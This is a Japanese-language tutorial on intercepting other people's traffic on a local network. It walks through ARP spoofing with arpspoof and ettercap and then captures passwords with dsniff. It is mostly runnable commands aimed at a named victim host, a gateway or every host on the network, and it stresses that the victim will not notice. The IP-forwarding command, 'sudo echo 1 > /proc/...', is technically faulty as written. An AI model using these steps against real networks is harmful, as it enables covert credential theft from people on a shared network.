Dsniff は、認証情報をキャプチャして処理するための、最も包括的で強力な、自由に利用できるパケット スニッフィング ツール スイートの 1 つです。その機能と多数のユーティリティにより、攻撃者がネットワークからパスワードと認証情報を盗聴するために使用する一般的なツールとなっています.
ネットワーク スイッチは、ネットワーク ハブのようにネットワーク内の全員にパケットを転送するわけではないため、理論的には、ネットワーク内の人は他の人のトラフィックを見ることができません。ただし、ARP スプーフィングを実行することで、この問題を解決する方法があります。
スニフ
この投稿では、プロセスの背後にある理論については説明せずに、それがどのように行われるかについて説明します.まず、必要なプログラムをインストールします。この場合は、必要な arpspoof プログラムを含む dsniff パッケージです。 Ubuntu またはその他の Debian ベースのディストリビューションでは、次のように apt-get コマンドでインストールできます。
インストール中 (Ubuntu)
$ sudo apt-get install dsniff
IP 転送を有効にする
トラフィックがマシンに到達したときに実際の宛先に確実に転送されるようにするには、次のコマンドを実行する必要があります。
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
これにより、ターゲット マシンの接続が切断されていないことを確認し、誰も私たちが何をしているのか気付かないようにします。
ARP スプーフィングを実行する
次のコマンドはゲートウェイに「私は 192.168.0.100 です」と伝え、次のコマンドは 192.168.0.100 に「私はゲートウェイです」と伝えます
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
これにより、マシンからゲートウェイに送信されるはずのすべてのトラフィック、およびその逆のすべてのトラフィックは、最初にマシンを通過してから、実際のターゲットに転送されます。これにより、tcpdump や wireshark などのパケット分析ツールを実行できます。
エッターキャップ
ただし、プロセス全体を簡単にするプログラムがあります。これに適したプログラムの 1 つが ettercap です。 Ettercap は、他の多くの機能の中でもとりわけ、ARP スプーフィングを実行できます。 Ubuntu では、このパッケージは ettercap-gtk と呼ばれます;
インストール中 (Ubuntu)
$ sudo apt-get install ettercap-gtk
ARP スプーフィングを実行する (GUI)
-G スイッチを指定してプログラムを実行すると、ncurses ではなく GTK で実行されます。
$ sudo ettercap -G
メニューで、次を選択します。
Sniff -> Unfied sniffing
プロンプトで、使用するネットワーク インターフェイスを選択します。通常は eth0 です
Network Interface: eth0
再びメニューで、次を選択してネットワーク内のすべてのホストをリストに追加します
Hosts -> Scan for hosts
そして、次のようにすると、ネットワーク内の全員に対して arp スプーフィングが行われます
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
ARP スプーフィングを実行する (コマンド)
次のコマンドは、上記の例と同じことを 1 つのコマンドで実行します。
$ sudo ettercap -q -T -M arp // //
dsniff コマンドの例
1. 安全でないプロトコルのネットワークを監視するには:
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. 結果を印刷する代わりにデータベースに保存するには:
# dsniff -w gotcha.db [other options...]
3. データベースから結果を読み取って印刷するには:
# dsniff -r gotcha.db